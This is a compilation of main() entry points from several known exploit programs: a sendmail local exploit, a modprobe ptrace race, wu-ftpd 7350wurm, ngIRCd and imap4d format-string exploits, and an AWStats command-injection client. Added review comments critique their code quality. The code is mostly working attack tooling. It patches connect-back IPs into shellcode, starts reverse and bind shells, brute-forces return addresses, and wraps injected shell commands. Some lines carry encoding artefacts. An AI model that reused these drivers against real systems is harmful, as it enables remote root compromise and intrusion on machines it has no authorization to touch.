 *    check holds for all atoi() results;
 *  - `targets[t].pvpbuf/zero/chunk/ret` are printed with "0x%x", which
 *    assumes int-sized fields — cannot tell from here;
 *  - `t` is reused to hold exploit()'s result after the table index is no
 *    longer needed;
 *  - the process always exits 0, even on failure.
 */
int main(int argc, char *argv[])
{
    int t = 0;
    int brute = 1;
    int opt;

    printf("Local sendmail 8.11.6 exploit by sorbo ([email protected])\n");

    while( (opt = getopt(argc,argv,"t:bh")) != -1) {
        switch(opt) {
            case 't':
                t = atoi(optarg);
                if(t >= sizeof(targets)/sizeof(struct target_info)) {
                    printf("Invalid target %d\n",t);
                    exit(0);
                }
                brute = 0;   /* an explicit target disables bruteforce unless -b follows */
                break;
            case 'b':
                brute = 1;
                break;
            case 'h':
            default:
                usage(argv[0]);
        }
    }

    printf("Attempting to exploit %s\n",targets[t].description);
    if(brute) {
        bruteforce(targets[t]);
        exit(0);
    }

    printf("pvpbuf=\t\t0x%x\n",targets[t].pvpbuf);
    printf("zero=\t\t0x%x\n",targets[t].zero);
    printf("chunk=\t\t0x%x\n",targets[t].chunk);
    printf("shellcode=\t0x%x\n",targets[t].ret);

    t = exploit(targets[t]);
    if(t) printf("Exploit successfull\n");
    else printf("Exploit failed... try adding -b\n");
    exit(0);
}
/*
 * Brute-force driver for a local exploit: repeatedly forks a child that
 * calls exploit(ret, path) (defined elsewhere) with a return address swept
 * around esp(), first upward in steps of `offset` up to +3000, then
 * downward from esp() to -3000. The loop also stops as soon as getuid()
 * returns 0, and finishes by running system("id").
 *
 * Review notes (code left byte-identical):
 *  - `if ((pid = fork()) == 0) { child } else perror("fork failed");` — the
 *    else branch runs in the parent after every *successful* fork, so
 *    "fork failed" is printed once per attempt, and a real failure (-1) is
 *    not distinguished (waitpid(-1, ...) then waits for any child);
 *  - the getuid() condition can only change for this process if exploit()
 *    changes the parent's credentials — it runs in the child here, so the
 *    loop in practice ends when `x` leaves the ±3000 window;
 *  - `x` first climbs 0..3000, is reset to -1, and then descends; the
 *    `x<=3000&&x>=0` / `x>=-3000&&x<0` arms are mutually exclusive.
 */
void bruteforce(char **path)
{
    pid_t pid;
    int x=0, offset=5;
    long ret;

    printf("attemping brute force\n\n");
    if(!getuid()) {
        printf("brute force cannot be run while uid is 0\n");
        exit(0);
    }

    ret=esp()+offset;
    while(getuid()&&(x<=3000&&x>=-3000)) {
        if((pid=fork())==0) {
            exploit(ret,path);   /* one attempt per child */
            exit(0);
        }
        else
            perror("fork failed");   /* reached in the parent on every fork, see note */
        if(waitpid(pid,NULL, 0)!= pid)
            perror("waitpid error");

        /* sweep: upward to +3000, then restart from esp() and go downward */
        if(x>=3000) {
            ret=esp();
            x=-1;
        }
        else if(x<=3000&&x>=0) {
            ret+=offset;
            x+=offset;
        }
        else if(x>=-3000&&x<0) {
            ret-=offset;
            x-=offset;
        }
        printf("%d\n\n",x);
    }
    printf("brute force complete..\n\n");
    system("id");
}
/*
 * Entry point of a format-string test harness: patches the address of
 * shell() into the file-scope `shellcode` buffer at offset 1, builds a
 * "%<width>p%n" format string targeting RETLOC into the file-scope
 * `formatstrings`, copies it into a NOP-filled buffer and passes that to
 * new_function() and exploit() (both defined elsewhere).
 *
 * Review notes (code left byte-identical):
 *  - `(int) shell` and `(int )shellcode -4` truncate pointers to 32 bits;
 *    this only works on ILP32;
 *  - the four "%c" bytes of RETLOC are written raw, so a zero byte in
 *    RETLOC terminates `formatstrings` early;
 *  - sprintf() into `formatstrings` is unbounded (its size is not visible
 *    here);
 *  - memcpy(code, formatstrings, sizeof(formatstrings)) copies the pointer
 *    size if `formatstrings` is a pointer, or the whole array (including
 *    bytes past the terminator) if it is an array — cannot tell from here;
 *  - `formatstrings` is printed via "%s", not as a format — correct;
 *  - `argc`/`argv` are unused and main has no return statement.
 */
int main(int argc,char **argv)
{
    char code[1024];
    unsigned int len;

    *(int *)(shellcode+1)=(int) shell;   /* patch immediate at shellcode+1 */
    memset(code,NOP,1024);
    len = 256;
    printf("shellcode addr is:%p\nshell addr is %p\n",shellcode,shell);
    /* RETLOC as 4 little-endian bytes, then "%<N>p%n" with N = shellcode - 4 */
    sprintf(formatstrings,"%c%c%c%c%%%dp%%n",RETLOC&0x000000ff,(RETLOC&0x0000ff00)>>8,(RETLOC&0x00ff0000)>>16, (RETLOC&0xff000000)>>24,(int )shellcode -4);
    printf("%s",formatstrings);
    fflush(stdout);
    memcpy(code,formatstrings,sizeof(formatstrings));
    new_function(len,code);
    exploit(len,code);
}
/*
 * DLL entry point. On DLL_PROCESS_ATTACH it records the module handle in the
 * file-scope `hAppInstance`, runs exploit() (defined elsewhere) and then
 * terminates the host process with ExitProcess(0). DLL_QUERY_HMODULE is not
 * a standard dwReason value; it is presumably project-defined and lets a
 * caller retrieve the stored handle through lpReserved — confirm against
 * its definition.
 *
 * Review notes (code left byte-identical):
 *  - doing real work inside DllMain runs under the loader lock; calling
 *    ExitProcess() from there is explicitly discouraged by the Win32 docs;
 *  - `bReturnValue` is never changed, so the function always returns TRUE
 *    and the `break` after ExitProcess() is unreachable;
 *  - Defender's view: a DLL whose attach handler immediately runs a payload
 *    and kills the process is a loader-triggered execution pattern worth a
 *    detection rule on DllMain-time process termination.
 */
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
    BOOL bReturnValue = TRUE;

    switch( dwReason ) {
        case DLL_QUERY_HMODULE:
            /* hand the stored module handle back through lpReserved */
            if( lpReserved != NULL )
                *(HMODULE *)lpReserved = hAppInstance;
            break;
        case DLL_PROCESS_ATTACH:
            hAppInstance = hinstDLL;
            exploit();
            ExitProcess(0);   /* never returns */
            break;
        case DLL_PROCESS_DETACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
            break;
    }
    return bReturnValue;
}
/*
 * Entry point of a local privilege-escalation exploit that races the kernel's
 * modprobe user-mode helper: writes `shellcmd` to SHELL, forks a helper child
 * that pins memory, triggers a module request (open(ENTRY)), and in the
 * parent polls /proc/<pid>/status until a modprobe with equal uid/euid/suid/
 * fsuid shows up, attaches with ptrace, waits for a usable EIP and calls
 * exploit(pid). fatal(), get_ids(), sighnd(), the flag `sig` and the register
 * struct `regs` are file-scope; SHELL, ENTRY, TMPSIZE, FMAX, MMSIZE, MAXSTACK
 * are project macros.
 *
 * Review notes (code left byte-identical):
 *  - `®s` in the PTRACE_GETREGS call is a mis-encoded `&regs` (HTML entity
 *    "&reg;" artefact); the line does not compile as shown;
 *  - `while (!sig);` spins on a flag set from a signal handler; this is only
 *    correct if `sig` is `volatile sig_atomic_t` — its declaration is not
 *    visible here;
 *  - `pid = getpid() + 2` guesses the PID the kernel will assign to modprobe;
 *    any intervening fork on the system breaks the guess;
 *  - open(SHELL)/fdopen()/fprintf() results are unchecked; the /dev/zero fds
 *    in the child loop are never closed (intentional: the loop exists to
 *    keep exec_usermodehelper busy);
 *  - `if (fd > 0)` treats fd 0 as failure;
 *  - `fclose(fp)` after the inner `while (1)` is unreachable (both arms end
 *    in fatal()/exit());
 *  - regs.eip is printed with "%p"; its type is a long in user_regs_struct;
 *  - `ac`/`av` are unused.
 */
int main(int ac, char **av)
{
    int fd, pid, p, i;
    char buf[TMPSIZE];
    struct uids uids;
    FILE *fp;

    setpgrp();
    setsid();
    umask(022);

    /* write the command the spoofed modprobe should run */
    unlink(SHELL);
    fd = open(SHELL, O_RDWR | O_CREAT | O_TRUNC, 0755);
    fp = fdopen(fd, "w+");
    fprintf(fp, "%s\n", shellcmd);
    fclose(fp);

    pid = getpid() + 2;   /* guessed PID of the upcoming modprobe, see note */
    snprintf(buf, sizeof(buf) - 1, "/proc/%d/status", pid);
    printf("\nModprobe pid %d, my pid %d", pid, getpid());
    fflush(stdout);
    signal(SIGUSR1, sighnd);

    // fork modprobe helper
    if (!(p = fork())) {
        // some nice work for exec_usermodehelper(), keep it busy!
        for (i = 0; i < FMAX; i++) {
            fd = open("/dev/zero", O_RDWR);
            mmap(NULL, MMSIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
        }
        kill(getppid(), SIGUSR1);
        while (!sig);   /* wait for the parent's go-ahead */
        printf("\nHelper (pid %d) requesting module...", getpid());
        fflush(stdout);
        fd = open(ENTRY, O_RDONLY | O_NONBLOCK);   /* triggers the module request */
        exit(0);
    }
    // synchronize with the child
    else {
        while (!sig);
        kill(p, SIGUSR1);
        // wait for modprobe to run at unprivileged level
        while (1) {
            fd = open(buf, O_RDONLY);
            if (fd > 0) {
                if (!(fp = fdopen(fd, "r")))
                    fatal("fdopen");
                /* require all four ids to be equal, i.e. the helper is not yet privileged */
                if (get_ids(fp, &uids) != 4 ||
                    (uids.uid != uids.euid || uids.uid != uids.suid || uids.uid != uids.fsuid)) {
                    fatal("did not catch modprobe...try again later :-)");
                }
                // ok, it runs...
                while (1) {
                    if (ptrace(PTRACE_ATTACH, pid, NULL, NULL)) {
                        fatal("PTRACE_ATTACH failed!");
                    }
                    else {
                        i = 0;
                        printf("\nAttached afterburner...\n");
                        fflush(stdout);
                        /* single-step syscalls until EIP is non-zero and below MAXSTACK */
                        while (ptrace(PTRACE_GETREGS, pid, 0, ®s) || !regs.eip || regs.eip >= MAXSTACK) {
                            ptrace(PTRACE_SYSCALL, pid, NULL, NULL);
                            printf("\rplease wait %d", i++);
                            fflush(stdout);
                        }
                        waitpid(pid, NULL, WUNTRACED);
                        printf ("\nValid EIP found EIP=%p\nexploiting the bug, good luck... ", regs.eip);
                        fflush(stdout);
                        exploit(pid);
                        exit(0);
                    }
                }
                fclose(fp);   /* unreachable, see note */
            }
        }
    }
    return 0;
}
/*
 * Entry point of the "7350wurm" wu-ftpd client: parses options, selects a
 * target entry (manual retloc/retaddr, explicit -t index, or -a banner
 * auto-detection), logs in over FTP, runs the heap-corruption stages
 * (xp_gapfill(), exploit(), a "CWD ~{" trigger) and finally sends either a
 * constructed execve payload (-m "mass" mode) or the interactive shell
 * payload. usage(), tgt_list(), tgt_frombanner(), ftp_login(),
 * ftp_recv_until(), net_write(), hexdump(), sc_build_x86_lnx(), shell() and
 * the globals automode, debugmode, verbose, mass, username, password, dest,
 * user_retloc, user_retaddr, targets[], tmanual, ftp_banner, shellcode,
 * shellcode_len, mcode, mlen, x86_lnx_execve, x86_lnx_shell, INIT_CMD,
 * RNFR_NUM, RNFR_SIZE and VERSION are defined elsewhere.
 *
 * Review notes (code left byte-identical):
 *  - `c` is `char` and compared with EOF; unsigned-char platforms loop
 *    forever (use int);
 *  - sscanf("%u", &tgt_num) writes an unsigned into an int — tolerated in
 *    practice but a format mismatch;
 *  - `tgt_num` defaults to -1, so `tgt_num >= sizeof(...)/sizeof(...)`
 *    (signed/unsigned) is true when no -t is given; the following
 *    `if (tgt_num != 0)` then prints "target out of list" even though no
 *    target was requested — a cosmetic quirk;
 *  - the -u value is discarded (`username` is set to a literal that has been
 *    redacted in this copy; only optarg is echoed);
 *  - `tgt->retloc = user_retloc` writes into the static table entry;
 *    `user_retaddr` is only announced here — presumably exploit() reads the
 *    global, confirm;
 *  - the two string literals below contain a raw line break (corpus
 *    artefact; a literal cannot span lines in C) — they are reproduced as
 *    found;
 *  - xpbuf is `unsigned char` but passed to strncmp (sign mismatch warning);
 *  - write()/net_write() results are unchecked.
 */
int main (int argc, char *argv[])
{
    char c;
    char * progname; /* = argv[0] */
    int fd;
    tgt_type * tgt = NULL;
    int tgt_num = -1;
    unsigned char xpbuf[512 + 16];

    fprintf (stderr, "7350wurm - x86/linux wuftpd <= 2.6.1 remote root "
             "(version "VERSION")\n"
             "team teso (thx bnuts, tomas, synnergy.net !).\n\n");
    progname = argv[0];
    if (argc < 2)
        usage (progname);

    while ((c = getopt (argc, argv, "hvaDmt:u:p:d:L:A:")) != EOF) {
        switch (c) {
            case 'h':
                usage (progname);
                break;
            case 'a':
                automode = 1;      /* pick the target from the FTP banner */
                break;
            case 'D':
                debugmode = 1;
                break;
            case 'v':
                verbose += 1;
                break;
            case 'm':
                mass = 1;          /* send a constructed execve payload instead of a shell */
                break;
            case 't':
                if (sscanf (optarg, "%u", &tgt_num) != 1)
                    usage (progname);
                break;
            case 'u':
                username = "******";
                printf ("username = %s\n", optarg);
                break;
            case 'p':
                password = optarg;
                break;
            case 'd':
                dest = optarg;
                break;
            case 'L':
                if (sscanf (optarg, "0x%lx", &user_retloc) != 1)
                    usage (progname);
                break;
            case 'A':
                if (sscanf (optarg, "0x%lx", &user_retaddr) != 1)
                    usage (progname);
                break;
            default:
                usage (progname);
                break;
        }
    }

    /* if both required offsets are given manually, then we dont have
     * to require a target selection. otherwise check whether the target
     * is within the list. if its not, then print a list of available
     * targets */
    if (user_retloc != 0 && user_retaddr != 0) {
        tgt = &tmanual;
    } else if (automode == 0 && (tgt_num == 0 || tgt_num >= (sizeof (targets) / sizeof (tgt_type)))) {
        if (tgt_num != 0)
            printf ("WARNING: target out of list. 
list:\n\n");
        tgt_list ();
        exit (EXIT_SUCCESS);
    }
    if (tgt == NULL && automode == 0)
        tgt = &targets[tgt_num - 1];

    /* mass mode: build an execve shellcode from the remaining argv */
    if (mass == 1) {
        if ((argc - optind) == 0)
            usage (progname);
        mlen = sc_build_x86_lnx (mcode, sizeof (mcode), x86_lnx_execve, &argv[optind]);
        if (mlen >= 0xff) {
            fprintf (stderr, "created argv-code too long " "(%d bytes)\n", mlen);
            exit (EXIT_FAILURE);
        }
        fprintf (stderr, "# created %d byte execve shellcode\n", mlen);
    }

    printf ("# trying to log into %s with (%s/%s) ...", dest, username, password);
    fflush (stdout);
    fd = ftp_login (dest, username, password);
    if (fd <= 0) {
        fprintf (stderr, "\nfailed to connect (user/pass correct?)\n");
        exit (EXIT_FAILURE);
    }
    printf (" connected.\n");
    if (debugmode) {
        printf ("DEBUG: press enter\n");
        getchar ();
    }
    printf ("# banner: %s", (ftp_banner == NULL) ? "???" : ftp_banner);

    if (tgt == NULL && automode) {
        tgt = tgt_frombanner (ftp_banner);
        if (tgt == NULL) {
            printf ("# failed to jield target from banner, aborting\n");
            exit (EXIT_FAILURE);
        }
        printf ("# successfully selected target from banner\n");
    }
    if (shellcode == NULL) {
        shellcode = tgt->shellcode;
        shellcode_len = tgt->shellcode_len;
    }
    if (verbose >= 2) {
        printf ("using %lu byte shellcode:\n", shellcode_len);
        hexdump ("shellcode", shellcode, shellcode_len);
    }
    if (user_retaddr != 0) {
        fprintf (stderr, "# overriding target retaddr with: 0x%08lx\n", user_retaddr);
    }
    if (user_retloc != 0) {
        fprintf (stderr, "# overriding target retloc with: 0x%08lx\n", user_retloc);
        tgt->retloc = user_retloc;   /* mutates the static table entry */
    }
    printf ("\n### TARGET: %s\n\n", tgt->desc);

    /* real stuff starts from here */
    printf ("# 1. filling memory gaps\n");
    xp_gapfill (fd, RNFR_NUM, RNFR_SIZE);
    exploit (fd, tgt);
    printf ("# 3. triggering free(globlist[1])\n");
    net_write (fd, "CWD ~{\n");
    /* success is recognised by the "sP" marker the first-stage code emits */
    ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "sP");
    if (strncmp (xpbuf, "sP", 2) != 0) {
        fprintf (stderr, "exploitation FAILED !\noutput:\n%s\n", xpbuf);
        exit (EXIT_FAILURE);
    }
    printf ("#\n# exploitation succeeded. 
sending real shellcode\n");

    if (mass == 1) {
        printf ("# mass mode, sending constructed argv code\n");
        write (fd, mcode, mlen);
        printf ("# send. sleeping 10 seconds\n");
        sleep (10);
        printf ("# success.\n");
        exit (EXIT_SUCCESS);
    }
    printf ("# sending setreuid/chroot/execve shellcode\n");
    net_write (fd, "%s", x86_lnx_shell);
    printf ("# spawning shell\n");
    printf ("##################################################" "##########################\n");
    write (fd, INIT_CMD, strlen (INIT_CMD));
    shell (fd);
    exit (EXIT_SUCCESS);
}
/*
 * Entry point of a remote exploit client (colour-macro variant of the
 * bind/reverse-shell client above): connects to argv[1]:PORT, runs exploit()
 * in connect-back mode (4 args) or bind mode (2 args) and, on success,
 * starts the reverse handler or connects to the bind shell on 4444.
 * header(), exploit() (returns 1 on failure), start_reverse_handler(),
 * connect_to_bindshell(), PORT, YELLOW and NORMAL are defined elsewhere.
 *
 * Review notes (code left byte-identical):
 *  - `remote_addr` is never zeroed (sin_zero holds stack garbage);
 *  - system("clear") spawns a shell just to clear the screen;
 *  - the "connecting to" line has no newline/fflush before connect();
 *  - inet_addr() yields a 32-bit value; the XOR with 0x99999999 as an
 *    unsigned long only matters for how exploit() consumes it;
 *  - atoi(argv[3]) is unvalidated; start_reverse_handler() receives the
 *    raw string, not the parsed port;
 *  - main has no return statement.
 */
int main ( int argc, char* argv[] )
{
    int s;
    unsigned long xoredip;
    unsigned short xoredcbport;
    struct sockaddr_in remote_addr;
    struct hostent *host_addr;

    /* nested-if form of (argc != 2 && argc != 4) */
    if ( argc != 2 )
        if ( argc != 4 ) {
            fprintf ( stderr, "\nUsage\n-----\n[ Bindshell ] %s <host>\n[ Reverseshell ] %s <host> <connectback ip> <connectback port>\n\n", argv[0], argv[0] );
            exit ( 1 );
        }
    if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL ) {
        fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] );
        exit ( 1 );
    }
    remote_addr.sin_family = AF_INET;
    remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
    remote_addr.sin_port = htons ( PORT );

    system ( "clear" );
    header ();
    if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 ) {
        printf ( "socket failed!\n" );
        exit ( 1 );
    }
    printf ( "--[ connecting to %s:%u...", argv[1], PORT );
    if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 ) {
        printf ( "failed!\n" );
        exit ( 1 );
    }
    printf ( YELLOW "done!\n" NORMAL);

    if ( argc == 4 ) {
        /* callback ip/port are XOR-obfuscated before being handed to exploit() */
        xoredip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
        xoredcbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
        if ( exploit ( s, xoredip, xoredcbport, 0 ) == 1 ) {
            printf ( "exploitation FAILED!\n" );
            exit ( 1 );
        }
        start_reverse_handler ( argv[3] );
    }
    else {
        if ( exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 ) {
            printf ( "exploitation FAILED!\n" );
            exit ( 1 );
        }
        connect_to_bindshell ( argv[1], 4444 );
    }
}
/*
 * Program entry point. All argument handling and work is delegated to
 * exploit() (defined elsewhere); its return value, if any, is not used.
 * The explicit `return 0` is what the original's fall-off-the-end already
 * meant under C99.
 */
int main(int argc, char **argv)
{
    exploit(argc, argv);
    return 0;
}
/*
 * Entry point: collects host (-h), syslog GOT address (-g or from the
 * file-scope `targets[]` via -t), an optional RET offset (-o), bruteforce
 * mode (-b, sets the file-scope flag `b`) and port (-p), resolves the host
 * and then calls exploit(host, gotaddr, ret, port) (defined elsewhere) once
 * or in a sweep from retaddr to 0x0806ffff in steps of 0x10.
 *
 * Review notes (code left byte-identical):
 *  - `opt` is `char` and compared with EOF; unsigned-char platforms loop
 *    forever (use int);
 *  - `targetnum = atoi(optarg)-1` is used to index targets[] before any
 *    range check, so "-t 0" or junk reads targets[-1] (UB);
 *  - `gotaddr`/`retaddr`/`i` are int but printed with "%010p";
 *  - the local named `system` shadows the libc function of the same name;
 *  - the bruteforce loop prints "failed!" only after exhausting the range;
 *    it relies on exploit() not returning on success — cannot confirm here;
 *  - main has no return statement.
 */
int main(int argc, char *argv[])
{
    char opt, *host=NULL, *system=NULL, *ircd=NULL;
    int i, ircdport=IRCD;
    int retaddr=0x0806b000, gotaddr=0, targetnum=0, offset=0;
    struct hostent *he;

    printf("\n ngIRCd <= 0.8.2 remote format string exploit\n");
    printf(" by CoKi <*****@*****.**>\n\n");

    while((opt = getopt(argc,argv,"h:g:t:lo:bp:")) != EOF) {
        switch (opt) {
            case 'h':
                host = optarg;
                break;
            case 'g':
                gotaddr = strtoul(optarg,NULL,0);
                system = "unknown";
                ircd = "unknown";
                break;
            case 't':
                targetnum = atoi(optarg)-1;       /* unchecked index, see note */
                if(targets[targetnum].num) {
                    system = targets[targetnum].os;
                    ircd = targets[targetnum].ircd;
                    gotaddr = targets[targetnum].got;
                }
                else use(argv[0]);
                break;
            case 'l':
                printlist();
                break;
            case 'o':
                offset = atoi(optarg);
                retaddr += offset;
                break;
            case 'b':
                b = 1;
                break;
            case 'p':
                ircdport = atoi(optarg);
                break;
            default:
                use(argv[0]);
                break;
        }
    }
    if(host == NULL) use(argv[0]);
    if(gotaddr == 0) use(argv[0]);
    if(system == NULL) {
        system = "unknown";
        ircd = "unknown";
    }

    printf(" [*] host\t\t\t: %s\n", host);
    printf(" [*] system\t\t\t: %s\n", system);
    printf(" [*] ircd version\t\t: %s\n", ircd);
    printf(" [*] syslog GOT address\t\t: %010p\n", gotaddr);
    printf(" [*] verifying host\t\t:");
    fflush(stdout);
    if((he=gethostbyname(host)) == NULL) {
        herror(" gethostbyname()");
        printf("\n");
        exit(1);
    }
    printf(" %s\n\n", inet_ntoa(*((struct in_addr *)he->h_addr)));

    /* bruteforce mode */
    if(b) {
        for(i = retaddr; i <= 0x0806ffff; i += 0x10) {
            printf(" [*] bruteforcing RET address\t: %010p", i);
            fflush(stdout);
            exploit(host, gotaddr, i, ircdport);
        }
        printf("\n [*] failed!\n\n");
    }
    /* single mode */
    else {
        printf(" [*] trying RET address\t\t: %010p", retaddr);
        fflush(stdout);
        if(offset) printf(" (offset %d)\n", offset);
        else printf("\n");
        exploit(host, gotaddr, retaddr, ircdport);
    }
}
/*
 * Entry point: parses target host/port (-h/-p) and optional connect-back
 * host/port (-c/-b), patches the callback address and port into the
 * file-scope `conn_back` shellcode, probes the target port with a
 * connect_timeout() connection, then calls getinfo() and exploit() (both
 * defined elsewhere). `rhost`, `rport`, `cback`, `shsize`, `conn_back`,
 * IMAPD, ERROR and TIMEOUT are file-scope.
 *
 * Review notes (code left byte-identical):
 *  - `opt` is `char` and compared with EOF; unsigned-char platforms loop
 *    forever (use int);
 *  - the NUL-byte check works by comparing strlen(conn_back) before and
 *    after patching; `shsize` is only assigned in the -c branch, so without
 *    -c the comparison is against whatever the global holds (0 if
 *    uninitialized at file scope);
 *  - the probe socket `sockfd` is never closed and is not passed on;
 *    exploit(host, port) presumably opens its own connection — confirm;
 *  - atoi() for ports is unvalidated; bzero() is legacy (memset);
 *  - main has no return statement.
 */
int main(int argc, char *argv[])
{
    char opt, *host=NULL, *rh=NULL;
    int sockfd;
    unsigned int imapdport=IMAPD;
    struct hostent *he;
    struct sockaddr_in dest_dir;

    printf("\n GNU Mailutils imap4d v0.6 remote format string exploit\n");
    printf(" by CoKi <*****@*****.**>\n\n");

    while((opt = getopt(argc,argv,"h:p:c:b:")) != EOF) {
        switch (opt) {
            case 'h':
                host = optarg;
                break;
            case 'p':
                imapdport = atoi(optarg);
                break;
            case 'c':
                rhost = inet_addr(optarg);
                rh = optarg;
                cback++;
                break;
            case 'b':
                rport = atoi(optarg);
                break;
            default:
                use(argv[0]);
                break;
        }
    }
    if(host == NULL) use(argv[0]);

    if(cback) {
        printf(" [*] verifying your host\t:");
        fflush(stdout);
        if((he=gethostbyname(rh)) == NULL) {
            herror(" gethostbyname()");
            printf("\n");
            exit(1);
        }
        /* remember the payload length, then patch ip (bytes 33..36) and port (39..40) */
        shsize = strlen(conn_back);
        conn_back[33]=(rhost & 0x000000ff);
        conn_back[34]=(rhost & 0x0000ff00) >> 8;
        conn_back[35]=(rhost & 0x00ff0000) >> 16;
        conn_back[36]=(rhost & 0xff000000) >> 24;
        conn_back[39]=(rport & 0xff00) >> 8;
        conn_back[40]=(rport & 0x00ff);
        printf(" %s\n", inet_ntoa(*((struct in_addr *)he->h_addr)));
        printf(" [*] connect back port\t\t: %u\n", rport);
    }
    /* a patched-in zero byte would have shortened the string */
    if(strlen(conn_back) < shsize) {
        printf("\n [!] failed! your host or port contain null-bytes\n\n");
        exit(1);
    }

    printf(" [*] verifying target host\t:");
    if((he=gethostbyname(host)) == NULL) {
        herror(" gethostbyname()");
        printf("\n");
        exit(1);
    }
    printf(" %s\n", inet_ntoa(*((struct in_addr *)he->h_addr)));
    printf(" [*] target imapd port\t\t: %u\n\n", imapdport);

    /* connectivity probe only; the socket is not reused below */
    printf(" [*] connecting...\t\t:");
    fflush(stdout);
    if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {
        perror(" socket()");
        printf("\n");
        exit(1);
    }
    dest_dir.sin_family = AF_INET;
    dest_dir.sin_port = htons(imapdport);
    dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
    bzero(&(dest_dir.sin_zero), 8);
    if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir, sizeof(struct sockaddr), TIMEOUT) == ERROR) {
        printf(" closed\n\n");
        exit(1);
    }
    printf(" done!\n\n");

    getinfo(host, imapdport);
    exploit(host, imapdport);
}
/*
 * Program entry point. No arguments are taken (no argc/argv); everything is
 * compiled in and exploit(), defined elsewhere, does all the work. The
 * original relied on implicit int and fall-off-the-end; both are spelled
 * out here with the same meaning.
 */
int main(void)
{
    exploit();
    return 0;
}
/*
 * Entry point: collects host/ip/script/path/port and an optional shell
 * command (-c) that is wrapped as " | <cmd> | " into `exeCmd`, then calls
 * exploit(host, path, script, cmd, ip, port) (defined elsewhere). usage()
 * is also defined elsewhere.
 *
 * Review notes (code left byte-identical):
 *  - off-by-one: exeCmd is 1024 bytes and the -c argument may be up to 1018
 *    characters; " | " + 1018 + " | " is exactly 1024 characters, so
 *    sprintf() writes the terminating NUL one byte past the buffer. The
 *    limit should be 1017, or sprintf() replaced by snprintf(exeCmd,
 *    sizeof exeCmd, ...);
 *  - the error text says 1024 while the check is against 1018;
 *  - the optstring begins with ':', so a missing option argument makes
 *    getopt() return ':' — that case is not handled by the switch;
 *  - `isgood == 1` rejects giving only one of -h/-i; giving neither silently
 *    uses the "localhost"/"127.0.0.1" defaults;
 *  - atoi() for the port is unvalidated.
 */
int main(int argc, char * argv[])
{
    extern char *optarg;
    extern int optind, optopt;
    int c, Xport = 80, isgood = 0;
    char *Xhost = "localhost" , *Xip = "127.0.0.1", *Xscript = "awstats.pl", *Xpath = "/cgi-bin";
    char exeCmd[1024] = "| echo \"You have been Owned, update AWstat or patch\" > /tmp/OWNED | ";

    while ((c = getopt(argc, argv, ":uh:i:s:p:c:o:")) != -1) {
        switch(c) {
            case 'h':
                Xhost = optarg;
                isgood++;
                break;
            case 'i':
                Xip = optarg;
                isgood++;
                break;
            case 's':
                Xscript = optarg;
                break;
            case 'p':
                Xpath = optarg;
                break;
            case 'c':
                /* 1018 + 6 wrapper chars fills exeCmd exactly, leaving no room for the NUL (see note) */
                if(strlen(optarg) > 1018) {
                    printf("# `-c` argument can't exceed 1024 bytes (command to long)");
                    exit(0);
                }
                sprintf(exeCmd, " | %s | ", optarg);
                break;
            case 'o':
                Xport = atoi(optarg);
                break;
            case 'u':
                usage(argv[0]);
                break;
            case '?':
                printf("# Unknown option `-%c`\n", optopt);
                break;
        }
    }

    /* both -h and -i, or neither */
    if( isgood == 1) {
        printf("# Please specify both host `-h` and ip `-i`\n");
        exit(0);
    }

    exploit(Xhost, Xpath, Xscript, exeCmd, Xip, Xport);
    return 0;
}